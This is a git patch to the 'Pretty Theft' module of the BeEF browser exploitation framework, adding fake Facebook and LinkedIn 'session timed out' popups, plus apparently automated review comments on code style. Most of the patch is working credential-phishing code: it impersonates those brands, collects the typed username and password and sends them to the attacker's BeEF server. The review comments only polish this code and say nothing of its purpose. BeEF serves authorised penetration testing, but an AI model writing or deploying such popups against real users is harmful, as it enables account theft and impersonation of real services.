From 483683ca78deb71f7d128e27f81fb523fe4d4f7b Mon Sep 17 00:00:00 2001 From: pwndizzle Date: Sat, 22 Sep 2012 18:38:09 +0800 Subject: [PATCH] Added Facebook and Linkedin popups, also some code/logic improvements --- .../pretty_theft/command.js | 143 ++++++++++++++---- .../pretty_theft/config.yaml | 4 +- .../social_engineering/pretty_theft/module.rb | 6 +- 3 files changed, 123 insertions(+), 30 deletions(-) diff --git a/modules/social_engineering/pretty_theft/command.js b/modules/social_engineering/pretty_theft/command.js index f53d6e311..911ffd801 100644 --- a/modules/social_engineering/pretty_theft/command.js +++ b/modules/social_engineering/pretty_theft/command.js @@ -50,16 +50,18 @@ beef.execute(function() { } if (vis) { // Calculate the page width and height - if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) { - var pageWidth = document.body.scrollWidth+'px'; - var pageHeight = document.body.scrollHeight+'px'; - } else if( document.body.offsetWidth ) { - var pageWidth = document.body.offsetWidth+'px'; - var pageHeight = document.body.offsetHeight+'px'; - } else { + //if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) { + // var pageWidth = document.body.scrollWidth+'px'; + // var pageHeight = document.body.scrollHeight+'px'; + //} else if( document.body.offsetWidth ) { + // var pageWidth = document.body.offsetWidth+'px'; + // var pageHeight = document.body.offsetHeight+'px'; + //} else { + + // Previous lines were not rendering page background correctly var pageWidth='100%'; var pageHeight='100%'; - } + //} //set the shader to cover the entire page and make it visible. dark.style.opacity=opaque; dark.style.MozOpacity=opaque; @@ -74,46 +76,133 @@ beef.execute(function() { } } - // function to send response + // CURRENTLY NOT USED + // Send done prompt to user function win(){ - document.getElementById('hax').innerHtml='

Thank you for re-authenticating, you will now be returned to the application

'; + document.getElementById('popup').innerHtml='

Thank you for re-authenticating, you will now be returned to the application

'; answer = document.getElementById('uname').value+':'+document.getElementById('pass').value; } - // perform darkening - grayOut(true); + // Check whether the user has entered a user/pass and pressed ok function checker(){ - processval = document.body.lastChild.getElementsByTagName("input")[2].value; - if (processval == "Processing..") { - uname = document.body.lastChild.getElementsByTagName("input")[0].value; - pass = document.body.lastChild.getElementsByTagName("input")[1].value; - answer = uname+":"+pass + uname1 = document.body.lastChild.getElementsByTagName("input")[0].value; + pass1 = document.body.lastChild.getElementsByTagName("input")[1].value; + valcheck = document.body.lastChild.getElementsByTagName("input")[3].value; + + if (uname1.length > 0 && pass1.length > 0 && valcheck == "true") { + // Join user/pass and send to attacker + answer = uname1+":"+pass1 beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer); - // set lastchild invisible + // Set lastchild invisible document.body.lastChild.setAttribute('style','display:none'); - // lighten screen - grayOut(false); clearInterval(credgrabber); - $j('#hax').remove(); + // Lighten screen + grayOut(false); + $j('#popup').remove(); $j('#darkenScreenObject').remove(); + + }else if((uname1.length == 0 || pass1.length == 0) && valcheck == "true"){ + // If user has not entered any data reset button + document.body.lastChild.getElementsByTagName("input")[3].value = "false"; + alert("Please enter a valid username and password."); } } - // floating div - function writeit() { + // Facebook floating div + function facebook() { + sneakydiv = document.createElement('div'); - sneakydiv.setAttribute('id', 'hax'); - sneakydiv.setAttribute('style', 'width:400px;height:320px;position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000'); + sneakydiv.setAttribute('id', 'popup'); + 
sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;'); + document.body.appendChild(sneakydiv); + + // Set appearance using styles, maybe cleaner way to do this with CSS block? + var windowborder = 'style="width:330px;background:white;border:10px #999999 solid;border-radius:8px"'; + var windowmain = 'style="border:1px #555 solid;"'; + var tbarstyle = 'style="color: rgb(255, 255, 255); background-color: rgb(109, 132, 180);font-size: 13px;font-family:tahoma,verdana,arial,sans-serif;font-weight: bold;padding: 5px;padding-left:8px;text-align: left;height: 18px;"'; + var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"'; + var messagestyle = 'style="align:left;font-size:11px;font-family:tahoma,verdana,arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"'; + var box_prestyle = 'style="color: grey;font-size: 11px;font-weight: bold;font-family: tahoma,verdana,arial,sans-serif;padding-left:30px;"'; + var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color: rgb(109,132,180);"'; + var buttonstyle = 'style="font-size: 13px;background:#627aac;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"'; + + var title = 'Facebook Session Timed Out'; + var messagewords = 'Your session has timed out due to inactivity.

Please re-enter your username and password to login.'; + var buttonLabel = ''; + + // Build page including styles + sneakydiv.innerHTML= '
' +title+ '

' + messagewords + '

Email:
Password:
' + '
' +buttonLabel+ '
'; + + // Repeatedly check if button has been pressed + credgrabber = setInterval(checker,1000); + } + + + // Linkedin floating div + function linkedin() { + + sneakydiv = document.createElement('div'); + sneakydiv.setAttribute('id', 'popup'); + sneakydiv.setAttribute('style', 'position:absolute; top:30%; left:40%; z-index:51; background-color:ffffff;'); + document.body.appendChild(sneakydiv); + + // Set appearance using styles, maybe cleaner way to do this with CSS block? + var windowborder = 'style="width:330px;background:white;border: 10px #999999 solid;border-radius:8px;"'; + var windowmain = 'style="border:1px #555 solid;"'; + var tbarstyle = 'style="color:white; font-size: 14px;font-family:Arial,sans-serif;font-weight: bold;outline-style: inherit;outline-color: #000000;outline-width: 1px;padding:5px;padding-left:8px;padding-right:6px;text-align: left;height: 22px;line-height:22px;border-bottom: 1px solid #CDCDCD;background: #F4F4F4;filter: progid:DXImageTransform.Microsoft.gradient(startColorstr=#919191, endColorstr=#595959);background: -webkit-gradient(linear, left top, left bottom, from(#919191), to(#595959));background: -moz-linear-gradient(top, #919191, #595959);"'; + +//-moz-box-shadow: 0 1px 4px #ccc;-webkit-box-shadow: 0 1px 4px #CCC;-o-box-shadow: 0 1px 4px #ccc;box-shadow: 0 1px 4px #CCC; + + var bbarstyle = 'style="color: rgb(0, 0, 0);background-color: rgb(242, 242, 242);padding: 8px;text-align: right;border-top: 1px solid rgb(198, 198, 198);height:28px;margin-top:10px;"'; + var messagestyle = 'style="align:left;font-size:11px;font-family:Arial,sans-serif;margin:10px 15px;line-height:12px;height:40px;"'; + var box_prestyle = 'style="color: #666;font-size: 11px;font-weight: bold;font-family: Arial,sans-serif;padding-left:30px;"'; + var inputboxstyle = 'style="width:140px;font-size: 11px;height: 20px;line-height:20px;padding-left:4px;border-style: solid;border-width: 1px;border-color:#CDCDCD;"'; + var buttonstyle = 'style="font-size: 
13px;background:#069;color:#fff;font-weight:bold;border: 1px #29447e solid;padding: 3px 3px 3px 3px;clear:both;margin-right:5px;"'; + var lilogo = 'http://press.linkedin.com/sites/all/themes/presslinkedin/images/LinkedIn_Logo_Web_Reverse_Trans2.png'; + var title = 'Session Timed Out LinkedIn'; + var messagewords = 'Your session has timed out due to inactivity.

Please re-enter your username and password to login.'; + var buttonLabel = ''; + + // Build page including styles + sneakydiv.innerHTML= '
' +title+ '

' + messagewords + '

Email:
Password:
' + '
' +buttonLabel+ '
'; + + // Repeatedly check if button has been pressed + credgrabber = setInterval(checker,1000); + } + + + // Generic floating div with image + function generic() { + sneakydiv = document.createElement('div'); + sneakydiv.setAttribute('id', 'popup'); + sneakydiv.setAttribute('style', 'width:400px;position:absolute; top:20%; left:40%; z-index:51; background-color:white;font-family:\'Arial\',Arial,sans-serif;border-width:thin;border-style:solid;border-color:#000000'); sneakydiv.setAttribute('align', 'center'); document.body.appendChild(sneakydiv); - sneakydiv.innerHTML= '

Your session has timed out!

For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.

Username:
Password:

'; + sneakydiv.innerHTML= '

Your session has timed out!

For your security, your session has been timed out. To continue browsing this site, please re-enter your username and password below.

Username:
Password:


'; + + // Repeatedly check if button has been pressed credgrabber = setInterval(checker,1000); } - writeit(); + // Set background opacity and apply background + var backcolor = "<%== @backing %>"; + if(backcolor == "Grey"){ + grayOut(true,{'opacity':'70'}); + }else if(backcolor == "Clear"){ + grayOut(true,{'opacity':'0'}); + } + // Retrieve the chosen div option from Beef and display + var choice = "<%= @choice %>"; + if(choice == "Facebook"){ + facebook(); + } else if(choice == "LinkedIn"){ + linkedin(); + } else{ + generic(); + } }); diff --git a/modules/social_engineering/pretty_theft/config.yaml b/modules/social_engineering/pretty_theft/config.yaml index ac175d6cd..e03c356bc 100644 --- a/modules/social_engineering/pretty_theft/config.yaml +++ b/modules/social_engineering/pretty_theft/config.yaml @@ -19,7 +19,7 @@ beef: enable: true category: "Social Engineering" name: "Pretty Theft" - description: "Asks the user for their username and password using a tidy floating div." - authors: ["vt [nick.freeman@security-assessment.com]", "xntrik"] + description: "Asks the user for their username and password using a floating div." + authors: ["pwndizzle", "vt [nick.freeman@security-assessment.com]", "xntrik"] target: user_notify: ['ALL'] diff --git a/modules/social_engineering/pretty_theft/module.rb b/modules/social_engineering/pretty_theft/module.rb index a816340c9..437f59819 100644 --- a/modules/social_engineering/pretty_theft/module.rb +++ b/modules/social_engineering/pretty_theft/module.rb 
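Review bot: The two template values at the end of this hunk are written into JavaScript string literals with different tags, `"<%== @backing %>"` and `"<%= @choice %>"`, and nothing visible limits either one to the combobox entries (they presumably come from the options declared in module.rb). Use one tag for both and have the module reject anything outside the fixed lists before the template is rendered. A `backcolor` that matches neither `"Grey"` nor `"Clear"` currently skips `grayOut` with no `else` or comment saying that is the intended default. Separately, `win()` is now marked `CURRENTLY NOT USED` yet is still edited and still assigns `innerHtml` (the DOM property is `innerHTML`), so deleting it would be cleaner than keeping dead code in the file.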
@@ -19,7 +19,11 @@ class Pretty_theft < BeEF::Core::Command
 configuration = BeEF::Core::Configuration.instance
 logo_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/beef.png"
 return [
- {'name' =>'imgsauce', 'description' =>'Custom Logo', 'ui_label'=>'Custom Logo', 'value' => logo_uri}
+ {'name' => 'choice', 'type' => 'combobox', 'ui_label' => 'Dialog Type', 'store_type' => 'arraystore', 'store_fields' => ['choice'], 'store_data' => [['Facebook'],['LinkedIn'],['Generic']], 'valueField' => 'choice', 'value' => 'Facebook', editable: false, 'displayField' => 'choice', 'mode' => 'local', 'autoWidth' => true },
+
+ {'name' => 'backing', 'type' => 'combobox', 'ui_label' => 'Backing', 'store_type' => 'arraystore', 'store_fields' => ['backing'], 'store_data' => [['Grey'],['Clear']], 'valueField' => 'backing', 'value' => 'Grey', editable: false, 'displayField' => 'backing', 'mode' => 'local', 'autoWidth' => true },
+
+ {'name' =>'imgsauce', 'description' =>'Custom Logo', 'ui_label'=>'Custom Logo (Generic only)', 'value' => logo_uri}
 ]
 end
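Review bot: In both new combobox entries, `editable: false` creates a Symbol key while every other key in the hash is a String, so a consumer that looks up `'editable'` will not find it. Write it as `'editable' => false` to match the rest, unless the UI code is known to read the symbol; that code is not visible here. The allowed values exist only in `store_data`, so a short comment such as `# keep in sync with the checks where choice/backing are read` would make clear that the same lists have to be enforced where the options are consumed. The enclosing method starts outside the hunk.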